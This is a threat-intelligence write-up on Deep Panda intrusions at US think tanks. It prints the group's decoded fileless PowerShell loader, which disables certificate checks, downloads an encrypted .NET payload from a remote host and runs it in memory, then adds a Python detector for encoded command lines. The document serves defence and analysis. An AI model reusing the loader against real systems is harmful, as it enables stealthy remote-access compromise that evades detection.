Chinese hackers, aka “Deep Panda”, leverage PowerShell while compromising US think-tank computer systems.
Recently, we detected breaches of these networks via PowerShell scripts deployed by the adversary as scheduled tasks on Windows machines. The scripts are passed to the PowerShell interpreter on the command line, which avoids placing extraneous files on the victim machine that could trigger AV- or Indicator of Compromise (IOC)-based detection.
The script on the command line is Base64-encoded; once decoded, it reads as follows:
# Accept any TLS certificate: the validation callback always returns $true.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$wc = New-Object -TypeName System.Net.WebClient
# The Accept-Language q-value encodes process bitness: 0.3 on 32-bit, 0.7 on 64-bit.
$wc.Headers.Add("Accept-Language", "en-US,en;q=0." + ([IntPtr]::Size - 1).ToString())
$wc.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)")
# A random per-request value is sent as a cookie; the same value seeds the IV below.
$rndn = Get-Random
$wc.Headers.Add("Cookie", "p=" + $rndn)
# Fetch the encrypted, gzip-compressed .NET payload into memory.
$data = $wc.DownloadData("https://<ANONYMIZED>/config/oauth/")
# Arguments later handed to the payload's entry point.
[string[]]$xags = "https://<ANONYMIZED>/config/login/", "WMITool.Program", "Main", "/f", "ssh", "/s", "<ANONYMIZED>", "/p", "443"
$Passphrase = "<ANONYMIZED>"
$salts = "<ANONYMIZED>"
# AES-256 key derived with PasswordDeriveBytes (PBKDF1, SHA1, 5 iterations);
# IV is the first 16 bytes of SHA1($rndn), so the server can derive the same IV from the cookie.
$r = New-Object System.Security.Cryptography.RijndaelManaged
$pass = [System.Text.Encoding]::UTF8.GetBytes($Passphrase)
$salt = [System.Text.Encoding]::UTF8.GetBytes($salts)
$r.Key = (New-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 5).GetBytes(32) #256/8
$r.IV = (New-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($rndn) )[0..15]
# Decrypt, then gunzip, entirely in memory.
$d = $r.CreateDecryptor()
$ms = New-Object IO.MemoryStream @(,$data)
$cs = New-Object Security.Cryptography.CryptoStream $ms, $d, "Read"
$dfs = New-Object System.IO.Compression.GzipStream $cs, ([IO.Compression.CompressionMode]::Decompress)
$msout = New-Object System.IO.MemoryStream
[byte[]]$buffer = New-Object byte[] 4096
[int]$count = 0
do
{
    $count = $dfs.Read($buffer, 0, $buffer.Length)
    $msout.Write($buffer, 0, $count)
} while ($count -gt 0)
$dfs.Close()
$cs.Close()
$ms.Close()
$r.Clear()
# Load the decrypted assembly reflectively and invoke its entry point; nothing touches disk.
[byte[]]$bin = $msout.ToArray()
$al = New-Object -TypeName System.Collections.ArrayList
$al.Add($xags)
$asm = [System.Reflection.Assembly]::Load($bin)
$asm.EntryPoint.Invoke($null, $al.ToArray())
sleep 5
Exit
Once executed, the script downloads a .NET executable (typically named Wafer) and runs it from memory; Wafer in turn typically downloads and runs the MadHatter .NET Remote Access Tool (RAT), one of DEEP PANDA's favorites. Because both stages run from memory, they leave no disk artifacts or host-based IOCs for forensic analysis to find. This is typical for DEEP PANDA — stealth is their specialty, and they prefer to operate in a way that leaves a minimal footprint on a victim system and often allows them to evade detection for a very long time.
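Because the loader lives only on the command line, the place to look for it is process-creation or scheduled-task telemetry. The following Python, an added example and not part of the original article, decodes the UTF-16LE Base64 payload behind PowerShell's -EncodedCommand switch and flags command lines that combine the loader's distinctive API calls; the log lines, regex and marker list are constructed for the example.

```python
import base64
import re

# API fragments whose co-occurrence in one decoded script matches the loader
# above: certificate validation disabled, payload fetched, AES-decrypted,
# gunzipped and loaded through reflection.
LOADER_MARKERS = (
    "ServerCertificateValidationCallback",
    ".DownloadData(",
    "RijndaelManaged",
    "GzipStream",
    "[System.Reflection.Assembly]::Load(",
    ".EntryPoint.Invoke(",
)

# Matches -e / -ec / -enc / -EncodedCommand followed by the Base64 blob.
ENC_CMD_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script (UTF-16LE) or None."""
    m = ENC_CMD_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def loader_markers(cmdline):
    """Markers from LOADER_MARKERS present in the decoded script (empty if none)."""
    script = decode_encoded_command(cmdline)
    return [] if script is None else [m for m in LOADER_MARKERS if m in script]

def is_suspicious(cmdline, min_markers=3):
    return len(loader_markers(cmdline)) >= min_markers

def scan(cmdlines):
    """Return (index, markers) for every command line flagged as suspicious."""
    return [(i, loader_markers(c)) for i, c in enumerate(cmdlines) if is_suspicious(c)]

def _encode(script):
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines (not real telemetry): a benign encoded task,
# one mirroring the structure of the loader with placeholder values, and a non-PowerShell line.
BENIGN_SCRIPT = "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }"
LOADER_SCRIPT = (
    "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
    "$wc = New-Object System.Net.WebClient;"
    "$data = $wc.DownloadData('https://PLACEHOLDER/config/oauth/');"
    "$r = New-Object System.Security.Cryptography.RijndaelManaged;"
    "$asm = [System.Reflection.Assembly]::Load($bin);"
    "$asm.EntryPoint.Invoke($null, $al.ToArray())"
)
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -EncodedCommand " + _encode(BENIGN_SCRIPT),
    "powershell.exe -w hidden -enc " + _encode(LOADER_SCRIPT),
    "schtasks.exe /query /fo LIST",
]
```

Feed real command lines from Sysmon Event ID 1 or Security 4688 (with command-line auditing enabled) into scan(); the marker threshold keeps a lone WebClient download or Assembly.Load from firing on its own.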
Read the article:
Deep in Thought: Chinese Targeting of National Security Think Tanks